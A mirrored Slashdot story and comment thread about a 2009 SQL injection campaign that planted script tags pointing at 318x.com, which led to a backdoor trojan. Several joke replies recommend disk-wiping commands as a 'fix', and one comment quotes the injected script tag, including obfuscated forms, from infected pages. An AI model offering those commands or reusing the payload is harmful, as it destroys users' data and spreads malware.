Slashdot Mirror

← Back to Stories (view on slashdot.org)

SQL Injection Attack Claims 132,000+

Posted by CmdrTaco on from the check-yer-code-people dept.

An anonymous reader writes "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009."

44 of 186 comments (clear)

  1. hey by Spazztastic · · Score: 2, Funny

    Hey, I went to 318x.com and all of a sudden my computer is acting funny. Any suggestions?

    --
    Posts not to be taken literally. Almost everything is sarcasm.
    1. Re:hey by jo42 · · Score: 4, Funny

      dd if=/dev/zero of=/dev/sda bs=8192 will fix it.

    2. Re:hey by Yvan256 · · Score: 4, Funny

      Call a comedy club and get your computer on stage?

    3. Re:hey by unformed · · Score: 2, Funny

      dd: opening `/dev/sda` failed: Permission denied.

    4. Re:hey by Anonymous Coward · · Score: 2, Funny

      "'dd' is not recognized as an internal or external command, operable program or batch file."

      Still broken! =(

      Posting AC so I don't get modded to hell by people who either don't think that was funny or are simply incapable of recognizing a joke.

    5. Re:hey by Anonymous Coward · · Score: 2, Funny

      sudo !!

      sudo dd if=/dev/zero of=/dev/sda bs=8192

      Nope. Just says "Bad command or file name".

    6. Re:hey by blair1q · · Score: 2, Insightful

      that's the point

      it's not a security issue if you deliberately do something ignorant

      like, say, using the internet

      THE INTERNET IS NOT SECURE

      says so right on the packaging, and always has

    7. Re:hey by Arancaytar · · Score: 3, Funny

      I actually post all my comments via a dead-man's-switch proxy that logs my keystrokes in real time and submits the post once it detects inactivity. This way I can type things like Candlejack and still publish my po

    8. Re:hey by shutdown+-p+now · · Score: 2, Informative

      That one is outdated. What he needs is "rd /s/q C:\".

  2. Little Bobby Tables by bmearns · · Score: 2, Funny

    I blame Mrs. Roberts.

    --
    Slashdot is not a game, Slashdot is not a game. Crap, I just lost points.
  3. 318x.com by NoYob · · Score: 2, Interesting
    I tried to go there and I got this from Google: Diagnostic page for 318x.com

    After doing a whois, I see that just about all information is described as "Unknown"

    Why is this domain still in existence? Can ICANN take it down?

    It looks like the sole reason for this domain is for malware.

    --
    It's NOT me! It's the meds! I'm on 1000mg of Fukitol.
    1. Re:318x.com by NeverVotedBush · · Score: 2, Informative

      318x.com is now in my hosts file. Can at least try to protect ourselves...

  4. why don't these go away? by v1 · · Score: 3, Interesting

    If they know where the site is that's hosting the payload why don't they just shut them down? I realize the locations for the hosting are carefully chosen to provide maximum insulation, but still you'd expect that by now (years after this sort of thing became common) that there'd be mechanisms and procedures in place to break these down swiftly?

    --
    I work for the Department of Redundancy Department.
    1. Re:why don't these go away? by qazsedcft · · Score: 2, Insightful

      If it were kiddy porn it would be shutdown already.

    2. Re:why don't these go away? by jimicus · · Score: 3, Insightful

      You are assuming that all the systems are hosted at reputable hosting companies that pro-actively monitor all their systems.

      There are millions of systems worldwide that are exposed to the public internet (even though they probably shouldn't be) that are sitting in the corner somewhere waiting for someone to "get around to decommissioning them" - and in the meantime they're pumping out spam and taking part in DDoS attacks.

    3. Re:why don't these go away? by wowbagger · · Score: 2, Informative

      You must be new here, let me welcome you to "The Internet". I hope you enjoy your visit.

      Hosting companies don't give a pair of fetid dingo's kidneys about such matters, so long as the people responsible for the hosting pay good money.

      Even the hosting companies that claim to be anti-spam, and who's acceptable use policies state that ANY support of spam, including hosting spamvertized web sites, when confronted with multiple, on-going violations, will ignore all reports, remove all forum posts calling attention to those posts, and continue to cash the checks from the spammers.

      --
      www.eFax.com are spammers
    4. Re:why don't these go away? by Narcocide · · Score: 2, Insightful

      No you're wrong. People attack Windows because the most people use it AND it is conveniently also less inherently secure than anything else in current production. If everyone stopped using Windows and switched to XYZ then XYZ would eventually become the new biggest target, that is true but it is just as completely naive to assume the same percentage of attacks would be successful on an entirely different platform as Windows as it is to assume that you would have a remotely accurate clue about what that new percentage would be unless you were fluent in the use of "XYZ" which I'm assuming you are not because you can't even spell Linux right.

  5. Reminds me of xkcd by BountyX · · Score: 3, Funny

    Seriously people stop naming your kids with ');DROP TABLE at the end...

    --
    Trying to install linux on my microwave, but keep getting a kernel panic...
  6. Details? by HangingChad · · Score: 3, Insightful

    I love the way they fail to mention what server systems might be effected. Is it SQL Server? MySQL? .NET? PHP? Windows servers? Linux? Both? What web sites are vulnerable?

    It's always fun to snicker when you get to the registry entries which points to Windows. Although there was a trojan for Ubuntu in a desktop theme a few days ago, so enjoy the time to mock Windows users while it lasts.

    --
    That's our life, the big wheel of shit. - The Fat Man, Blue Tango Salvage
    1. Re:Details? by Yvan256 · · Score: 4, Insightful

      But a Trojan needs user access and approval to get installed. No OS on the planet can protect itself from a user with the admin password.

    2. Re:Details? by Bert64 · · Score: 4, Funny

      Windows 9x used to due a pretty good job, can't own a system once it's bluescreened.

      --
      http://spamdecoy.net - free throwaway anonymous email - avoid spam!
    3. Re:Details? by LordKaT · · Score: 5, Insightful

      Even still, this blog post is fucking useless. What CMS? What input is not being validated? Is it an underlying problem with Drupal? Wordpress? Joomla? What version?

      On top of that, it doesn't give any recommendations for what end users could do to protect themselves. Does anti-virus software already detect it? Can you simply alter your hosts file? Disable Javascript?

      The blog post is completely fucking useless.

    4. Re:Details? by necrogram · · Score: 2, Informative

      They didn't mention it because it doesn't matter. Its the result of bad coding practices. A sql injection attack is caused by the front end application accepting whatever input its given and using to generate the sql statements. You stop these attacks by sanitizing your input, use stored procedures to do the database work, and possibly stick in a middle ware tear to handle database access, ie apache -> websphere -> database.

    5. Re:Details? by HangingChad · · Score: 2, Informative

      They didn't mention it because it doesn't matter. Its the result of bad coding practices.

      It does too matter. You don't infect 132,000 web sites with separate injection attacks. That's automated. Lot of the people running forums and CMS-driven web sites don't understand the code well enough to fix anything.

      Heck, one of my sites was hacked once, through the forum software. I'm not in the habit of combing through forum code looking for unvalidated inputs. So if someone could mention what the parent exploit is, what versions of that software are effected and whether the operating system OS makes a difference, then those same webmasters could make sure their software was up to date. This article describes the client exploit. I don't care about that, surf with Windows and that's going to happen. I do care that crap isn't originating with any of my web sites.

      --
      That's our life, the big wheel of shit. - The Fat Man, Blue Tango Salvage
    6. Re:Details? by lseltzer · · Score: 2, Insightful

      If it's really over 100,000 sites with the same attack then there's something obvious they have in common, like the same PHP/MYSQL library, and it has a predictable vulnerability in it.

  7. How is SQL involved? by Bromskloss · · Score: 3, Interesting

    The article said "SQL" in the headline, but never mentioned it again after that.

    --
    Swedish plasma phys. PhD student; MSc EE; knows maths, programming, electronics; finance interest; seeks opportunities
    1. Re:How is SQL involved? by jDeepbeep · · Score: 2, Interesting

      The article said "SQL" in the headline, but never mentioned it again after that.

      My guess is that the compromised websites all have something in common, such as running the same CMS for example. You're right though, the article is short on details of the injection itself.

      --
      Reply to That ||
    2. Re:How is SQL involved? by Gary+van+der+Merwe · · Score: 2, Informative

      On the server end there is a SQL injection exploit being used to get the malicious code out there.

      My point being that you don't need to do a SQL injection to do this.

      To prevent a SQL injection, you need to change ' to '' on input from the user that you pass to sql.

      To prevent a HTML+script injection, you need to change < to &lt;, > to &gt; & to &amp; etc. on input from the user that render to the browser. The sites in question are not doing this, hence, just stick the code you wish to inject into at comment or some other user field. This has nothing to do with SQL.

  8. The real problem by Anonymous Coward · · Score: 2, Informative

    So it's MS and Adobe vulnerabilities that actually let the malware onto your system.
    FTA:

    Observed exploits include:

            * Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
            * MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
            * Microsoft Office Web Components vulnerabilities described in MS09-043
            * Microsoft video ActiveX vulnerability described in MS09-032
            * Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.

  9. Re:Windoze by TheNinjaroach · · Score: 5, Informative

    All I can tell (from TFA), is it affects Windows servers.

    SQL injection attacks affect any number of platforms. It's not a Windows problem, it's not a database problem, it's a "we hired cheap, unskilled developers" problem.

    Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.

    --
    I went to eat some animal crackers and the box said, "Do not eat if seal is broken." I opened the box and sure enough..
  10. Re:Windoze by jDeepbeep · · Score: 2, Informative

    Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.

    Yeah. I saw my error after I had posted it, so I tried to correct it with a follow up.

    --
    Reply to That ||
  11. Obvious, but needs to be said by GreenTom · · Score: 4, Informative

    Add to windows\system32\drivers\etc\hosts:

    127.0.0.1 318x.com

    And you should be safe, for the moment.

  12. No... by Oxford_Comma_Lover · · Score: 3, Interesting

    The assumption is that once there are a hundred thousand servers hit, and maybe fewer, if the hosting company doesn't shut down the site within an hour or two a responsible upstream router blocks traffic from the site. Every delivered payload costs society more time and money.

    --
    -- IANAL, this isn't legal advice, and definitely isn't legal advice for you. Also, Squee!
  13. Let's say it all together now... by gregarican · · Score: 2, Interesting

    validate your SQL inputs before posting them against an Internet-facing database. This isn't an SQL problem. This isn't a Windows-based problem. This is a poor coders problem. If there are high-profile websites that were compromised I'd be one pissed off PHB fo sho...

    1. Re:Let's say it all together now... by Vellmont · · Score: 3, Informative


      validate your SQL inputs before posting them against an Internet-facing database.

      Or simply use prepared statements (or whatever the equivalent term is in your language of choice). Prepared statements are far safer and easier than trying to validate all the current potential and future potential for breaking out of a SQL statement. It won't protect you from people putting in their own parameters into your SQL statement (like say someone elses userID), but that's a different class of vulnerability.

      --
      AccountKiller
  14. Re:Windoze by gregarican · · Score: 2, Insightful

    Uhhhhh, you really RTFA? It doesn't matter what the server is running to get compromised by an SQL injection, does it? Could be MySQL running on a RedHat server. Could be SQL Server running on a Windows server. Why would an SQL injection be platform-dependent? After all, isn't that why SQL is ANSI and _relatively_ portable betwen platforms? I did say "relatively" of course ::rollseyes::

  15. Re:AV Detection by REggert · · Score: 2, Informative

    according to TFA:

    Malware description

    Threatname: Backdoor.Win32.Buzus.croo

    Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).

    That's the trojan that's being installed by the exploits served up by the injected IFRAME. It is not the vulnerability that is allowing the IFRAME to be injected to begin with.

    --

    cp /dev/zero ~/signature.txt

  16. Terrible article, inappropriate headline by erroneus · · Score: 2, Interesting

    The source of the attacks are servers who have been compromised through SQL injection. I get that. It's an important detail. They fail to identify what sites and/or what those sites are running that is exploitable in this way. Is it MySQL? Is it MS SQL? Oracle? Is it a particular software package running on a particular web host platform? The questions are too many and should have been answered in the article.

    What is done after a server is compromised is pretty common. Microsoft components, especially those linked through ActiveX, have been not just a hole in Microsoft security, but a tunnel into the Windows kernel big enough to drive a truck through. A vulnerability in Adobe flash is only a a problem when it uses ActiveX to get there. Flash running in other ways does not seem to pose such an extreme threat otherwise. But while these are important security concerns to be aware of, it has nothing to do with the topic of the story as indicated by the headline or the first line of the story which is about compromised SERVERS, not about compromised clients.

  17. 132,000? Try 1269. by milesw · · Score: 2, Interesting

    As many have pointed out, the blog post does not offer sufficient detail, but does offer the rather sensational headline "SQL injection attack claims 132,000+". The Google Safe Browsing diagnostic page for 318x.com has it closer to 1200 or so:

    http://google.com/safebrowsing/diagnostic?site=318x.com/

    Has this site acted as an intermediary resulting in further distribution of malware?
    Over the past 90 days, 318x.com appeared to function as an intermediary for the infection of 1202 site(s) including 37y.org/, jxagri.gov.cn/, glojj.com/.

    Has this site hosted malware?
    Yes, this site has hosted malicious software over the past 90 days. It infected 1269 domain(s), including 37y.org/, cec.org.cn/, jxagri.gov.cn/.

  18. Re:Lame coders who don't care about security! by DNX+Blandy · · Score: 3, Insightful

    Very true, at which point this function simply doubled up the string delimiters, breaking the SQL injection. The major problem with Classic ASP was the casting of variables, if not done properly you were asking for it. If it's numeric, check it. .NET does not suffer from this problem unless the coder specifically passes a numeric value thou to an SQL statement as a string, which would be stupid. If everyone used stored procedures to deal with the SQL data, none of this would happen. My above checks alert you to the fact that someone if having a go, you can't do that when checking for string delimiters as they are valid characters, but yes, if your code uses a shitty "execute" command, check it. If you use proper stored procedures, this will no affect you.

  19. SQL injections? Are those for H1N1? by fortapocalypse · · Score: 2, Funny

    Oops. Send those SQL injections back. We don't need them.

  20. Re:SQL injection portability by butlerm · · Score: 2, Informative

    For various reasons, an SQL injection generally targets a specific application running on a specific database. Unless your database interface is seriously deficient, like MS SQL server, it is difficult to perform a successful SQL injection without knowing what the table structure is. And of course, most applications do not run on multiple database types.

  21. Re:Lame coders who don't care about security! by shutdown+-p+now · · Score: 2, Insightful

    You don't need stored procedures, all you need are parametrized statements/commands, so long as your API provides it. And plain ADO, which was used with classic ASP, did provide parametrized commands.

    Any attempt to defeat SQL injection by blacklisting syntax is inherently error-prone if only because it may break on a future version of database (when its syntax gets extended). Not to mention that, unless you have perfect knowledge of 100% of the SQL dialect that your implementation uses, you may forget to blacklist some corner case.

    In short, if you use text substitution to counter SQL injection, you're not doing it right.

  22. Re:Probably the Asprox botnet. by jbezorg · · Score: 2, Informative

    I concur. Searching for the iframe script, this is what I found. Sorry if I can't say if it's something like dotnet nuke. The ocassional coldfusion page also has me wondering.

    From the first page of a google search for "<script src=http://318x.com></script>":

    City of Iowa City<script src=http://318x.com></script> - How to ...
    Microsoft VBScript runtime error '800a000d'. Type mismatch: '[string: "1035<script src=http"]'. /default/templates/top2.asp, line 60.
    www.icgov.org/default/?id=1787

    www.icgov.org:80
    GET / HTTP/1.1

    HTTP/1.1 400 Bad Request
    Server: Microsoft-IIS/5.0
    Date: Thu, 10 Dec 2009 20:29:42 GMT
    Connection: close
    Content-Length: 4009
    Content-Type: text/html

    YEMEN TIMES : Education
    Opportunities<script src=http://318x.com></script> Letters<script src=http://318x.com></script> Archive<script src=http://318x.com></script> ...
    www.yementimes.com/DEFAULTSUB.ASPX?pnc=57&pnm... - Cached

    IWCS - Learning<script src=http://318%78.com></script><script src ...
    Membership<script src=http://318%78.com></script><script src=http://318x.%63om></script> IWCS Shared Channels<script src=http://318%78.com></script><script ...
    www.iwcs.com/category.cfm?Category=2932

    --
    I've lost all my marbles except one & It's fun to test angular & centripetal acceleration in my skull